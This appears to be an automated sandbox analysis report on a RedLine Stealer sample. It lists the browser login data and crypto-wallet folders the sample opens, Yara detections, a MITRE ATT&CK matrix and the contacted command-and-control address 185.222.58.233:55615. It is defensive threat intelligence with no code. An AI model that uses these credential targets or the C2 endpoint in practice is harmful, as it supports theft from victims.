                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECcZgk.exe PID: 3920, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECcZgk.exe PID: 3920, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		231
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager241
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1507398 Sample: l2rMtmFkD6.exe Startdate: 08/09/2024 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 9 other signatures 2->60 8 l2rMtmFkD6.exe 7 2->8         started        12 ECcZgk.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\RoamingCcZgk.exe, PE32 8->42 dropped 44 C:\Users\user\...CcZgk.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp5831.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\l2rMtmFkD6.exe.log, ASCII 8->48 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->66 70 2 other signatures 8->70 14 l2rMtmFkD6.exe 15 51 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Injects a PE file into a foreign processes 12->68 24 ECcZgk.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 185.222.58.233, 49706, 49708, 49709 ROOTLAYERNETNL Netherlands 14->52 72 Found many strings related to Crypto-Wallets (likely being stolen) 14->72 74 Tries to steal Crypto Currency Wallets 14->74 28 conhost.exe 14->28         started        76 Loading BitLocker PowerShell Module 18->76 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        78 Tries to harvest and steal browser information (history, passwords, etc) 24->78 38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    l2rMtmFkD6.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ipinfo.io/ip%appdata%0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                    http://185.222.58.233:0%Avira URL Cloudsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                    185.222.58.233:556150%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                    https://api.ip.sb/geoip0%Avira URL Cloudsafe
                    http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                    http://185.222.58.233:556150%Avira URL Cloudsafe
                    https://api.ip.sb0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
                    http://185.222.58.233:55615/0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                    http://tempuri.org/00%Avira URL Cloudsafe
                    http://185.222.58.233:55615t-0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      185.222.58.233:55615true
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.222.58.233:55615/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabtmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.222.58.233:ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousl2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/CheckConnectResponsel2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.datacontract.org/2004/07/l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXl2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsl2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/DataSet1.xsdl2rMtmFkD6.exe, ECcZgk.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.222.58.233:55615l2rMtmFkD6.exe, 00000008.00000002.2207175755.000000000333E000.00000004.00000800.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ip.sbECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ip.sb/geoipECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/envelope/ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/CheckConnectl2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/VerifyUpdateResponsel2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0l2rMtmFkD6.exe, ECcZgk.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironmentECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponsel2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/GetUpdatesECcZgk.exe, 0000000E.00000002.2314976048.000000000335A000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003291000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ac.ecosia.org/autocomplete?q=tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.ipify.orgcookies//settinString.Removegl2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingl2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/GetUpdatesResponsel2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponsel2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/VerifyUpdatel2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/0l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namel2rMtmFkD6.exe, 00000000.00000002.2099262418.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2193981753.0000000002711000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
